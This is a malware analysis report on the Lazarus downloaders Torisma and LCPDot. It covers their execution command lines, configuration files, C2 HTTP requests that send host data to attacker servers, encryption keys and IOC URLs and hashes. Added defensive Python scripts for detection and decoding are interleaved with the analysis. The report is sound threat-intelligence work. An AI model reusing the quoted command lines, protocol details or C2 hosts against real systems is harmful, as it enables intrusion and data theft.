
Lazarus Malware Torisma and LCPDot

Overview of Torisma

Torisma is a downloader-type malware that downloads and executes modules from an external server. It has been observed spreading via malicious Word documents. The Torisma samples confirmed by JPCERT/CC are DLL files that are executed through rundll32.exe. The following is an example of the command line used to run Torisma.

"C:\Windows\System32\rundll32.exe" C:\ProgramData\USOShared\usosqlite3.dat,sqlite3_create_functionex mssqlite3_server_management jp-JP

It is run by calling the export function (sqlite3_create_functionex in this example) with the key used to decode its internal data (mssqlite3_server_management) passed as an argument. The following sections describe Torisma's configuration information, its communication method, and the modules it downloads.

Torisma configuration information

Torisma reads information such as its communication destination from a configuration file saved at the following path (note that some samples do not read a configuration file).

· %LOCALAPPDATA%\.IdentityService\AccountStore.bak

The configuration file begins with a 12-byte signature (0x98 0x11 0x1A 0x45 0x90 0x78 0xBA 0xF9 0x4E 0xD6 0x8F 0xEE); when the malware runs, only a file whose first bytes match this value is read as configuration. Figure 1 is an example of the configuration information.


Figure 1: Example of Torisma configuration information

The configuration information includes the communication destination and similar values (see Appendix A for details).
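As an added example (not code from the JPCERT/CC post), the following Python script checks a file header against the 12-byte Torisma configuration signature given above, so a responder can triage the documented %LOCALAPPDATA% path or scan a directory tree for the same header. The signature and the relative path are taken from the post; the sample blobs at the bottom are constructed for the self-check and are not real Torisma data.

```python
import os
import sys
from pathlib import Path
from typing import Iterator, Optional

# Signature from the post: a Torisma configuration file must start with these 12 bytes.
TORISMA_CONFIG_SIGNATURE = bytes(
    [0x98, 0x11, 0x1A, 0x45, 0x90, 0x78, 0xBA, 0xF9, 0x4E, 0xD6, 0x8F, 0xEE]
)

# Save path from the post, relative to %LOCALAPPDATA%.
CONFIG_RELATIVE_PATH = Path(".IdentityService") / "AccountStore.bak"


def has_torisma_signature(data: bytes) -> bool:
    """True if the blob starts with the Torisma configuration signature.
    A blob shorter than the signature can never match."""
    return data[: len(TORISMA_CONFIG_SIGNATURE)] == TORISMA_CONFIG_SIGNATURE


def file_has_signature(path: Path) -> bool:
    """Read only the header; unreadable or missing files count as no match."""
    try:
        with path.open("rb") as fh:
            return has_torisma_signature(fh.read(len(TORISMA_CONFIG_SIGNATURE)))
    except OSError:
        return False


def documented_config_path() -> Optional[Path]:
    """The path the post names, resolved from the current environment."""
    base = os.environ.get("LOCALAPPDATA")
    return Path(base) / CONFIG_RELATIVE_PATH if base else None


def scan_tree(root: Path) -> Iterator[Path]:
    """Yield every regular file under root whose header matches. The post notes
    that some samples use no configuration file at all, so a clean result here
    does not rule out an infection; a match is a strong indicator."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            candidate = Path(dirpath) / name
            if candidate.is_file() and file_has_signature(candidate):
                yield candidate


# Constructed sample blobs (not real Torisma data) used for the self-check below.
CONSTRUCTED_CONFIG = TORISMA_CONFIG_SIGNATURE + b"\x00" * 4 + b"constructed config body"
CONSTRUCTED_BENIGN = b"MZ\x90\x00" + b"\x00" * 20

if __name__ == "__main__":
    target = documented_config_path()
    if target is not None:
        print(f"{target}: {'MATCH' if file_has_signature(target) else 'no match or absent'}")
    # Optionally scan one or more directory trees given on the command line.
    for arg in sys.argv[1:]:
        for hit in scan_tree(Path(arg)):
            print("signature match:", hit)
```

Run it with no arguments to check only the documented path, or pass a directory to scan every file under it; only the first 12 bytes of each file are read, so scanning a large tree is cheap.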

Communication with Torisma’s server

The following is an example of the first HTTP POST request that Torisma makes.

POST /[PATH] HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: Keep-Alive
Content-Length: [Length]
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: [Server]
Cache-Control: no-cache

ACTION=VIEW&PAGE=[MAC Address]&CODE=[Number]&CACHE=[Base64 Data]REQUEST=[Number]

[Base64 Data] contains the communication destination URL, the MAC address, and other values (see Appendix B for the format of the data sent). If the server returns the following response to this HTTP POST request, Torisma sends the next request.

Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}

The next HTTP POST request to send is:

POST /[PATH] HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: Keep-Alive
Content-Length: [Length]
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: [Server]
Cache-Control: no-cache

ACTION=PREVPAGE&CODE=C[Number]&RES=[Number]

In response to this request, the server returns a module that is encrypted and then Base64-encoded (with "+" converted to a space). Torisma uses the VEST-32 algorithm for this encryption. In all samples confirmed by JPCERT/CC, the encryption key was "ff7172d9c888b7a88a7d77372112d772" (see Figure 2). The same encryption is also used for the communication destination information held in the configuration.


Figure 2: Key used for Torisma’s VEST-32 encryption
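The two-step exchange above lends itself to a simple proxy-log check. The following Python script is an added example (not code from the post): it labels a POST body as the first or second Torisma request, recognises the "Your request has been accepted. ClientID: {...}" reply that triggers the second request, and undoes the transport encoding of the module reply (spaces back to "+", then Base64). It stops at the Base64 layer: the result is still VEST-32 ciphertext, and no VEST-32 implementation is included here. The log records are constructed for the demonstration and are not real traffic; the User-Agent string is the one quoted in the post.

```python
import base64
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# User-Agent quoted in the post. It is an ordinary IE11 string, so on its own it
# is only a supporting signal; the request body is the stronger one.
TORISMA_USER_AGENT = (
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
    ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; InfoPath.3)"
)

# Server reply that makes Torisma proceed to the second request.
ACCEPT_RE = re.compile(r"Your request has been accepted\. ClientID: \{[0-9a-f]+\}")


def classify_torisma_body(body: str) -> Optional[str]:
    """Label a form-encoded POST body if it matches either Torisma request."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    action = params.get("ACTION")
    # First request: ACTION=VIEW&PAGE=<MAC>&CODE=<n>&CACHE=<base64>... The post
    # shows no separator before REQUEST=, so only the leading keys are required.
    if action == "VIEW" and {"PAGE", "CODE", "CACHE"}.issubset(params):
        return "torisma-initial-beacon"
    # Second request: ACTION=PREVPAGE&CODE=C<n>&RES=<n>
    if action == "PREVPAGE" and {"CODE", "RES"}.issubset(params):
        return "torisma-module-request"
    return None


def is_torisma_accept_response(text: str) -> bool:
    """True if the response body carries the ClientID acknowledgement."""
    return ACCEPT_RE.search(text) is not None


def decode_module_response(text: str) -> bytes:
    """Reverse the transport encoding of the module reply: the server replaced
    '+' in the Base64 text with a space, so restore '+' before decoding. The
    returned bytes are still VEST-32 ciphertext (key given in the post)."""
    restored = text.rstrip("\r\n").replace(" ", "+")
    return base64.b64decode(restored, validate=True)


# Constructed log records (method, user_agent, request_body, response_body).
CONSTRUCTED_LOG: List[Tuple[str, str, str, str]] = [
    ("POST", TORISMA_USER_AGENT,
     "ACTION=VIEW&PAGE=00-11-22-33-44-55&CODE=1&CACHE=QUJDREVG&REQUEST=2",
     "Your request has been accepted. ClientID: {0123456789abcdef0123}"),
    ("POST", TORISMA_USER_AGENT, "ACTION=PREVPAGE&CODE=C1&RES=2", "  8="),
    ("POST", "Mozilla/5.0 (X11; Linux x86_64)", "username=alice&password=hunter2", "302"),
    ("GET", TORISMA_USER_AGENT, "", "<html></html>"),
]


def scan_log(records) -> List[Tuple[int, str]]:
    """Return (record index, label) for each record that looks like Torisma C2."""
    hits = []
    for idx, (method, ua, body, response) in enumerate(records):
        if method != "POST":
            continue
        label = classify_torisma_body(body)
        if label is None:
            continue
        if is_torisma_accept_response(response):
            label += "+accepted"
        if ua == TORISMA_USER_AGENT:
            label += "+known-ua"
        hits.append((idx, label))
    return hits


if __name__ == "__main__":
    for idx, label in scan_log(CONSTRUCTED_LOG):
        print(idx, label)
    print(decode_module_response(CONSTRUCTED_LOG[1][3]).hex())
```

The body check is deliberately keyed on the parameter names and ACTION values rather than on the User-Agent, because the same IE11 string appears in legitimate traffic; the "+accepted" suffix tells an analyst that the server side was live and the second stage would have followed.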

Torisma module

Torisma can perform a variety of actions by downloading and running additional modules. A downloaded module is not a PE file but raw executable code, as shown in Figure 3.


Figure 3: Code example for the Torisma module

JPCERT/CC has confirmed that multiple modules are used during an attack. The modules we have confirmed have the following functions:

· Sending information about infected hosts

· Execution of a specific file

Overview of LCPDot

Like Torisma, LCPDot is a downloader-type malware that downloads and executes modules from an external server. Some of the confirmed samples are obfuscated with VMProtect. The malware is believed to have been used to spread the infection inside the network after a Torisma infection. The samples confirmed by JPCERT/CC run with the following options given at runtime.

· -p: RC4 key

· -s: Base64-encoded communication destination

The following is an example when executing with options specified.

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Adobe\Adobe.bin -p 0x53A4C60B

The following sections describe LCPDot's communication method and configuration information.

Communication with LCPDot’s server

The following is an example of the first HTTP POST request that LCPDot sends.

POST /[URL] HTTP/1.1
Accept: text/html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=[Base64 data]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: [Host]
Content-Length: [Size]
Connection: Keep-Alive
Cache-Control: no-cache

Cookie=Enable&CookieV=[Number]&Cookie_Time=64

[Base64 data] is the encoded value of "[ID] -101010" (the same [ID] is used in subsequent communications). If the server returns the following response to this HTTP POST request, LCPDot sends the next request.

Success

LCPDot then sends the following HTTP GET request:

GET /[URL] HTTP/1.1
Accept: text/html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=[Base64 data]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: [Host]
Content-Length: [Size]
Connection: Keep-Alive
Cache-Control: no-cache

[Base64 data] is the encoded value of "[ID] -101011". In response, the RC4-encrypted module is downloaded. The RC4 key is the SHA1 hash of the value embedded in the sample or given with the -p option at runtime.
Because the module was not available at the time of analysis, its functionality is unknown, but we have confirmed that after the module runs, the subsequent communication disguises the transmitted data as a GIF image (Figure 4).


Figure 4: Code to disguise LCPDot transmission data as a GIF image

LCPDot configuration information

LCPDot embeds the communication destination in the sample (it can also be given with the -s option at runtime). The destination is XOR + Base64 encoded. The following Python script decodes an encoded destination.

    import base64

    def decode_destination(encode_data):
        # Reverse the encoding: Base64-decode, then for each byte XOR with 0x25 and subtract 0x7a.
        decoded_base64_data = base64.b64decode(encode_data)
        return "".join(chr((b ^ 0x25) - 0x7a) for b in decoded_base64_data)

    print(decode_destination(encode_data))

LCPDot saves configuration data, including this communication destination, to a file. We have confirmed multiple patterns for the path of this file. The following are examples.

· %TEMP%\..\Thumbnails.db

· %TEMP%\..\ntuser.log1

The data in the configuration file is RC4-encrypted; as with the module, the key is the SHA1 hash of the value embedded in the sample or given with the -p option at runtime. Figure 5 is an example of decrypted configuration data.


Figure 5: Example of decrypted configuration data
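The following Python script is an added example (not code from the post) covering the two LCPDot artefacts described above that can be checked offline: the SESSID cookie, whose Base64 value carries "[ID] -101010" on the first POST and "[ID] -101011" on the GET, and the RC4-encrypted configuration file (and module), whose key is the SHA1 hash of the -p value. The post does not say whether the -p value is hashed as its ASCII text or as a number, nor whether the raw 20-byte digest or its hex form is the key; this example assumes the ASCII text and the raw digest, and both assumptions are marked in the code. The configuration blob is constructed here by encrypting a made-up plaintext with the same routine, so it is not a real LCPDot configuration.

```python
import base64
import hashlib
from typing import Optional, Tuple

# Stage markers quoted in the post.
STAGE_MARKERS = {"101010": "initial beacon", "101011": "module request"}


def make_sessid(host_id: str, marker: str) -> str:
    """Build a SESSID value in the post's "[ID] -<marker>" layout (test data only)."""
    return base64.b64encode(f"{host_id} -{marker}".encode("ascii")).decode("ascii")


def classify_sessid(cookie_value: str) -> Optional[Tuple[str, str]]:
    """Decode a SESSID cookie; return (ID, stage) if it matches LCPDot's layout."""
    try:
        text = base64.b64decode(cookie_value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    head, sep, marker = text.rpartition("-")
    if not sep or marker not in STAGE_MARKERS:
        return None
    return head.strip(), STAGE_MARKERS[marker]


def derive_rc4_key(p_value: str) -> bytes:
    """RC4 key = SHA1 of the -p value. Assumption (not stated in the post): the
    value is hashed as its ASCII text and the raw 20-byte digest is the key."""
    return hashlib.sha1(p_value.encode("ascii")).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_lcpdot_config(blob: bytes, p_value: str) -> bytes:
    """Decrypt a configuration file (or module) body with the -p derived key."""
    return rc4(derive_rc4_key(p_value), blob)


# Constructed test data (not a real LCPDot configuration). The -p value is the
# one shown in the post's command line; the plaintext and host ID are made up.
CONSTRUCTED_P_VALUE = "0x53A4C60B"
CONSTRUCTED_CONFIG_PLAINTEXT = b"constructed: https://c2.example.invalid/view.php"
CONSTRUCTED_CONFIG_BLOB = rc4(derive_rc4_key(CONSTRUCTED_P_VALUE), CONSTRUCTED_CONFIG_PLAINTEXT)
CONSTRUCTED_SESSID = make_sessid("abc123", "101010")

if __name__ == "__main__":
    print(classify_sessid(CONSTRUCTED_SESSID))
    print(decrypt_lcpdot_config(CONSTRUCTED_CONFIG_BLOB, CONSTRUCTED_P_VALUE))
```

When applying this to a real sample, try the hex form of the digest and the alternative interpretation of the -p value as well if the first attempt yields noise; the classification half needs no such guesswork, since the marker layout is stated in the post.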

IOCs

https[:]//www.commodore.com.tr/mobiquo/appExtt/notdefteri/writenote.php
https[:]//www.fabianiarte.com/newsletter/arte/view.asp
https[:]//www.scimpex.com/admin/assets/backup/requisition/requisition.php
https[:]//akramportal.org/public/voice/voice.php
https[:]//inovecommerce.com.br/public/pdf/view.php
https[:]//www.index-consulting.jp[:]443/eng/news/index.php
http[:]//kenpa.org/yokohama/main.php
https[:]//vega.mh-tec.jp[:]443/.well-known/index.php
http[:]//www.hirokawaunso.co.jp/wordpress/wp-includes/ID3/module.audio.mp4.php
https[:]//ja-fc.or.jp/shop/shopping.php
https[:]//www.leemble.com/5mai-lyon/public/webconf.php
https[:]//www.tronslog.com/public/appstore.php
https[:]//mail.clicktocareers.com/dev_clicktocareers/public/mailview.php

Torisma
9ae9ed06a69baa24e3a539d9ce32c437a6bdc136ce4367b1cb603e728f4279d5
f77a9875dbf1a1807082117d69bdbdd14eaa112996962f613de4204db34faba7
7762ba7ae989d47446da21cd04fd6fb92484dd07d078c7385ded459dedc726f9
ff654c462598a38bf7eac32adaba1d98a9334ba1
681de106d387c41913863547c70ee66a1e9fbdc6
bab2c77c9e3eea39e2e8b0f4ff3b3d6490690eb8
634529cef6a2fdd6c5efeb658f43eb94
9a00ebe67d833edb70ed6dd0f4652592
004c8a97c2606c838764a629b13e4fb7

LCPDot
0c69fd9be0cc9fadacff2c0bacf59dab6d935b02b5b8d2c9cb049e9545bb55ce
a9334efa9f40a36e7dde7ef1fe3018b2410cd9de80d98cf4e3bb5dd7c78f7fde
ba57f8fcb28b7d1085e2e5e24bf2a463f0fa4bbbeb3f634e5a122d0b8dbb53cc
a9b253479a1723875711ea68059d890154119459
1d261bae90a95c20caf7a12e9b404dd39009267a
5f8d04df7a7c63b4bee2ba5f6ac3fa833c7f1872
b8df94ce84201b17684e0d368ed38024
81ca4bd42b01fe43cefd7fc38083bc6b
8ee9956a0631c641470a94fdc7b44430